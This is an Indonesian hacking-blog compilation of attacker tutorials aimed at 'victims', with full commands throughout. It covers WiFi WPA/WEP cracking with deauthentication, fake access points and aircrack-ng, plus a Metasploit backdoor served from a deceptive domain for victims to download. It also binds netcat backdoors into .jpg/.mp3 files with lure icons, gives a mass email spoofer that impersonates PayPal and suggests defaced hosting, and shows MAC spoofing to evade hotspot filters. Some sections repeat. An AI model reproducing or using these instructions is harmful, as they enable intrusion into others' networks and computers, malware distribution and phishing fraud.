oke langsung saja yapz . .
buka terminal dan kita scanning wifi yang akan di bajak aktifkan airmon-ng
dengan menggunakan perintah
airmon-ng start wlan0ganti wlan0 dengan interface kalian
setelah mode monitor aktik saatnya scanning korban
airodump-ng mon0
target wifi dengan security wpa2 dengan essid = trojanzboy@wifi channel = 3
setelah selesai menentukan korban
sekarang buka menu backtrack > expoitation tools > wireless exploitation tools > wlan exploitation > wifihoney
lalu masukkan perintah ./wifi_honey.sh <essid> <channel> <interface>
./wifi_honey.sh TrojanzBoy@wifi 3 wlan0
maka terciptalah wifi-wifi palsu
dan tunggu hingga korban connect ke salah satu wifi dan memasukkan password
tunggu hingga dapat wpa handshake dari akses point yang aslinya
maka wpa handshake yang asli pun kita dapatkan
saatnya pengecrack kan hasil handshake
buka terminal baru masuk directory dengan perintah
cd /pentest/wireless/wifi-honey
setelah itu cek hasil capture dengan perintah
ls
setelah menentukan hasil cap sekarang buka masukkan perintah aircrack
aircrack-ng -w /root/Desktop/Trojanzboy.txt /pentest/wireless/wifi-honey/cap-01.cap/root/Desktop/Trojanzboy.txt adalah letak wordlist yang telah saya dibuat bisa di kreasikan se kreatif mungkin agar password terpecahkan
dan cari nomer yang ada handshake dari akses point asli
dan tunggu hasilnya
SUKSES bro . . !!!
disini saya akan mempraktekkan cara exploit windows dengan syringe inject
pada ip publik biar seru tidak lagi pada local area
ok
langsung saja ya download scriptya di --> https://dl.dropboxusercontent.com/s/stqllmoj3skep0t/syringe%28by%20Trojanzboy.blogspot.com%29.rar?token_hash=AAEP3DPIVH3dBc149VC27UelZCf93Vn6NLPoJtGtWEp-EA&dl=1
lalu ekstrak pada DESKTOP maka terdapat dua file
1. syringe.sh
2. syfile.tar
langsung saja buka terminal dan masuk ke desktop
jangan lupa chomod 777 ya pada file syringe.sh
setelah di chmod buka file syringe.sh dan rubah ip public kalian
ip public saya = 125.164.221.221
ip local saya = 192.168.1.36
cara lihat ip public bisa masuk http://www.whatismyip.com/
edit syringe.sh
setelah di setting saatnya beraksi
balik lagi ke terminal tadi lalu ketikkan perintah
./syringe.sh
dan tunggu hingga payload terbuka dan metasploit run automatic
nah exploit selesai saatnya memforward ip local kita
masuk ke modem router 192.168.1.1
masukkan password anda
kita setting pada router/modem di NAT
jangan lupa masukkan port 80 untuk apache
dan 4444 untuk payload listener
setelah router tersetting aktifkan apache
pada menu backtrack >> service >> httpd >> apache start
kalau sudah selesai saatnya membungkus ip public kita agar tidak telanjang biar korban tidak curiga dengan menggunakan http://freedns.afraid.org/
daftar setelah daftar langsung isi domain anda terserah buat pengecohan korban
setelah selesai save
dns punya saya narutoupdate.strangled.net
sekarang menggabungkan url dengan listener metasploit
disini saya namakan trojanzboy.exe
jadinya http://narutoupdate.strangled.net/trojanzboy.exe
dan saatnya menyebarkan link backdoor anda
tunggu hingga korban masuk dalam link anda dan mendownloadnya
dan session meterpreter pun terbuka
syringe av
sesuai judul disini kita akan menyisipkan backdoor pada .doc.mp3.jpg dan ekstensi lainya
kita asumsikan netcat itu adalah backdoor/server kita
langsung aja ya download dulu programnya https://dl.dropboxusercontent.com/s/ui3evmrbp0k8g7u/Backdooring%20exec.rar?token_hash=AAG9YwfV4mAZgKm5RssDM_lBiusBdsMVDpCK9u5iNAWnWw&dl=1
setelah di download buka programnya
1. browse your server --> masukkan server backdoor disini saya contohkan netcat sebagai backdoor saya
2. pada file ekstensi isi ekstensi terserah kalian yang suport executable misalnya .jpg
3. browse file --> cari file gambar pada drive anda yamg berekstensi .jpg
4. browse icon kita bisa buat icon semenarik mungkin agar korban terkecoh caranya masuk pada web http://www.prodraw.net/favicon/index.php dan upload gambar yang ingin dijadikan icon
lalu UPLOAD dan pilih resolusi dan generate
dan download
5. setelah memilih icon saatnya pilih hasil output keluaran inject disini saya taruh di desktop saja dan mulai menginjectkan ke file .jpg
dan jika si testserverrcsC.jpg di buka maka netcat yang kita asumsikan sebagai backdoor pun juga ikut jalan
dan kita test lagi dengan ekstensi .mp3
netcat kita asumsikan sama sebagai backdoor kita
dan rubah pada exstension dengan mp3 jangan lupa pada browse kita cari file mp3 kita dan simpan pada desktop
lalu mulai menginjectkan
lalu terbentuklah file di desktop yang telah disisipkan netcat sebagai backoor kita
dan jika korban menjalankan mp3 yang telah kita sisipin backdoor maka
mp3 akan play dan si netcat juga jalan
dan sekarang hasil output itu siap upload ke public . .
Fake Mailer atau dalam istilah gaulnya fake email adalah teknik memanipulasi header email agar terbentuk email palsu untuk mengelabuhi penerima email. Teknik ini adalah satu fenomena perkembangan kemajuan teknologi informasi.
Fake mailer ini juga bisa di kirim ke semua mail box penyedia layanan email seperti yahoo, gmail, hotmail dan lain sebagainya. Bahkan, anda bisa mengirimkan email atas nama teman anda serta nama samaran lainnya.
Oke langsung saja kita mulai , sebelumnya saya akan kasih tau SC nya dulu
Berikut SC nya, tapi tunggu dulu, sebelum anda menggunakan script ini anda harus mempunyai domain dan hostingan sendiribisa buat hosting gratisan ataupun hasil curian alias deface
download scriptnya di --> https://dl.dropboxusercontent.com/s/gt5oxlysvlxs38z/massmail.rar?token_hash=AAGv8lyYIVyTBrihilxRIvYmEHZ7u8A_h5j6LVPzPcJ9ZQ&dl=1
screenshoot
keunggulan dari script ini kita bisa kirim banyak ke email sekaligus
lihat
dan send to inbox
lalu dalam inbox email korban
akan tertera paypal sebagai pengirimnya
demo = http://anekatop.com/wp-content/themes/example/massmail.php
Setelah anda puas berhasil menghack WEP dengan Backtrack kini anda akan saya bawa untuk mengetahui cara hacking WLAN / Hotspot yang berenkripsi WPA.
ok langsung ya
buka terminal pada backtrack
lalu hidupkan mode monitornya disini interface saya wlan0
ketikkan perintah
terus cari wifi yang terkunci dengan enkripsi wpa2
disini saya akan menyerang wifi trojanzboy@wifi
ketikkan perintah
ket: -w wpa2 = hasil capturing nantinya(bisa diganti namanya)
-c 1 = channel yang digunakan broadcast hotspot
--bssid 94:0C:6D:EE:C2:3F = mac address hotspot
mon0= mode monitor interface
Jika dibarisan bawah terdapat station client yang terhubung dengan AP
selanjutnya yaitu saatnya kita mengirim perintah deauthentifikasi sebuah client yang terhubung caranya, buka terminal baru ketikan :
Ket= --deauth 10 = mode penyerangan sampai 10x
-a = mac adress hotspot
-c = client yang terhubung hotspot yaitu
ketika mengirim perintah deauth maka si client akan terputus dari hotspot tunggu sampai client konek lagi.Dan kamu akan mendapatkan WPA handshake
ket : hacking wpa2 tidak memerlukan banyak paket seperti hack wep.Kita hanya mencari handshake nya saja
Jika belum dapat handshake lakukan deauthentifikasi client lagi biar tidak usah mengetik ulang perintahnya anda cukup menekan tombol panah atas pada keyboard untuk mengulang perintah terakhir.
Namun sayangnya data yang kita terima (dari Capturan) masih terenkripsi, saat tutorial ini dibuat software aircrack-ng belum dapat membuka enkripsi tersebut akan tetapi hanya bisa menyamakan dan mencocokan binary-nya dengan bantuan kamus.
Tunggu sampai mendapatkan WPA handshake biarkan client mengkoneksikan lagi wifinya ke hotspot yang diserang apabia client sudah konek lagi maka kamu akan mendapatkan wpa handshake
Setelah dapat handshake saatnya kita mencocokan binary yang tercapture dengan bantuan kamus, buka Terminal ketikkan
wpa2-01.cap = hasil capture pada airodump-ng tadi
tunggu sampai wordlist/kamus mencocokkan hasil capturing tadi apabia berhasil maka kunci/key akan terpecahkan
Untuk memecahkan password wpa2 harus menggunakan wordlist atau kamus yang benar-benar akurat dan dibutuhkan kesabaran
apabila anda tidak punya wordlist bisa gunakan crunch atau yang lainya
cara menggunkan crunch bisa dilihat di http://trojanzboy.blogspot.com/2012/11/membuat-wordlist-akurat-dengan-crunch.html
ok langsung ya
buka terminal pada backtrack
lalu hidupkan mode monitornya disini interface saya wlan0
airmon-ng start wlan0setelah aktif mode monitornya sekarang waktunya scanning wifi yang akan di bobol passwordnya
ketikkan perintah
airodump-ng mon0
terus cari wifi yang terkunci dengan enkripsi wpa2
disini saya akan menyerang wifi trojanzboy@wifi
ketikkan perintah
airodump-ng -w wpa2 -c 1 --bssid 94:0C:6D:EE:C2:3F mon0
ket: -w wpa2 = hasil capturing nantinya(bisa diganti namanya)
-c 1 = channel yang digunakan broadcast hotspot
--bssid 94:0C:6D:EE:C2:3F = mac address hotspot
mon0= mode monitor interface
Jika dibarisan bawah terdapat station client yang terhubung dengan AP
selanjutnya yaitu saatnya kita mengirim perintah deauthentifikasi sebuah client yang terhubung caranya, buka terminal baru ketikan :
aireplay-ng --deauth 10 -a 94:0C:6D:EE:C2:3F -c 94:20:53:D5:09:65 mon0
Ket= --deauth 10 = mode penyerangan sampai 10x
-a = mac adress hotspot
-c = client yang terhubung hotspot yaitu
ketika mengirim perintah deauth maka si client akan terputus dari hotspot tunggu sampai client konek lagi.Dan kamu akan mendapatkan WPA handshake
ket : hacking wpa2 tidak memerlukan banyak paket seperti hack wep.Kita hanya mencari handshake nya saja
Jika belum dapat handshake lakukan deauthentifikasi client lagi biar tidak usah mengetik ulang perintahnya anda cukup menekan tombol panah atas pada keyboard untuk mengulang perintah terakhir.
Namun sayangnya data yang kita terima (dari Capturan) masih terenkripsi, saat tutorial ini dibuat software aircrack-ng belum dapat membuka enkripsi tersebut akan tetapi hanya bisa menyamakan dan mencocokan binary-nya dengan bantuan kamus.
Tunggu sampai mendapatkan WPA handshake biarkan client mengkoneksikan lagi wifinya ke hotspot yang diserang apabia client sudah konek lagi maka kamu akan mendapatkan wpa handshake
Setelah dapat handshake saatnya kita mencocokan binary yang tercapture dengan bantuan kamus, buka Terminal ketikkan
aircrack-ng -w '/root/Desktop/TrojanzBoyword.txt' wpa2-01.cap
keterangan :
-w '/root/Desktop/TrojanzBoyword.txt' = Letak wordlist/dictionary saya namakan TrojanzBoy.txt
wpa2-01.cap = hasil capture pada airodump-ng tadi
tunggu sampai wordlist/kamus mencocokkan hasil capturing tadi apabia berhasil maka kunci/key akan terpecahkan
Untuk memecahkan password wpa2 harus menggunakan wordlist atau kamus yang benar-benar akurat dan dibutuhkan kesabaran
apabila anda tidak punya wordlist bisa gunakan crunch atau yang lainya
cara menggunkan crunch bisa dilihat di http://trojanzboy.blogspot.com/2012/11/membuat-wordlist-akurat-dengan-crunch.html
tutor kali ini akan membaha tentang hacking wifi dengan security type wep
ok langsung ya
buka terminal pada backtrack
lalu hidupkan mode monitornya disini interface saya wlan0
ketikkan perintah
terus cari wifi yan g terkunci dengan enkripsi WEP
disini saya akan menyerang wifi trojanzboy@wifi
setelah menentukan target langsung saja kita berhentikan scanningnya dengan menekan ctrl + c
dan masukkan perintah
keterangan
-c = channel korban bisa di lihat di keterangan pada scanningnya
-w = output hasil scanning disini saya namakan wep
--bssid = mac address wifi korban
mon0 = mode monitor nya
setelah itu kita melihat data yang bertebaran pada wifi korban beserta beaconya
setelah itu tekan shift + t untuk membuka tab baru pada terminal
dan masukkan perintah
ket
-a = bssid korban
setelah itu kita melihat sukses atau tidak pada mode deauth tadi
jika success association succesful berarti kita sukses dan kita lanjut pada mode penyerangan selanjutnya
ketikkan perintah
dan tunggu sampai kita mendapatkan data pada mode monitor tadi
ingat data yang diperlukan sampai 30000 lebih ya
wow ternyata data sudah sampai 30000 sekarang saatnya proses pengcrackan data tersebut
ketikkan perintah
ket = jangan lupa nama capture tadi ya pada scanning dengan airodump
DAN PASSWORDNYA AKHIRNYA DITEMUKAN 0321861433
ok langsung ya
buka terminal pada backtrack
lalu hidupkan mode monitornya disini interface saya wlan0
airmon-ng start wlan0setelah aktif mode monitornya sekarang waktunya scanning wifi yang akan di bobol passwordnya
ketikkan perintah
airodump-ng mon0
terus cari wifi yan g terkunci dengan enkripsi WEP
disini saya akan menyerang wifi trojanzboy@wifi
setelah menentukan target langsung saja kita berhentikan scanningnya dengan menekan ctrl + c
dan masukkan perintah
airodump-ng -c 1 -w wep --bssid 94:0c:6d:ee:c2:3f mon0
keterangan
-c = channel korban bisa di lihat di keterangan pada scanningnya
-w = output hasil scanning disini saya namakan wep
--bssid = mac address wifi korban
mon0 = mode monitor nya
setelah itu kita melihat data yang bertebaran pada wifi korban beserta beaconya
setelah itu tekan shift + t untuk membuka tab baru pada terminal
dan masukkan perintah
aireplay-ng -1 0 -a 94:0c:6d:ee:c2:3f mon0
ket
-a = bssid korban
setelah itu kita melihat sukses atau tidak pada mode deauth tadi
jika success association succesful berarti kita sukses dan kita lanjut pada mode penyerangan selanjutnya
ketikkan perintah
aireplay-ng -3 -b 94:0c:6d:ee:c2:3f mon0
dan tunggu sampai kita mendapatkan data pada mode monitor tadi
ingat data yang diperlukan sampai 30000 lebih ya
wow ternyata data sudah sampai 30000 sekarang saatnya proses pengcrackan data tersebut
ketikkan perintah
aircrack-ng wep-01.cap
ket = jangan lupa nama capture tadi ya pada scanning dengan airodump
DAN PASSWORDNYA AKHIRNYA DITEMUKAN 0321861433
apa itu mac address
MAC (Medium Access Control) Address atau Physical Address adalah setara dengan nomor seri Kartu Jaringan (Network Interface Card/NIC). Setiap alamat MAC adalah unik yang panjangnya terdiri dari 48 bit. 24 bit pertama dari MAC Address merepresentasikan vendor pembuat kartu tersebut dan 24 bit sisanya merepresentasikan nomor kartu tersebut. Pada lapisan OSI (Open System Interconnection) MAC Address menempati lapisan Data Link Layer (layer kedua setelah Physical Layer).
ok kita langsung saja
buka terminal
dan kita cek dulu interface yang tersedia
airmon-ng
sebelumnya kita down kan dulu interfacenya
ifconfig wlan0 down
setelah itu mulailah merubah mac address nya
disini say merubahnya 00:11:22:33:44:55
macchanger -m 00:11:22:33:44:55 wlan0
setelah itu kita hidupkan lagi denag perintah up
ifconfig wlan0 up
dan sukes
cara ini bisa digunakan untuk mengakali hotspot yang memakai filter
































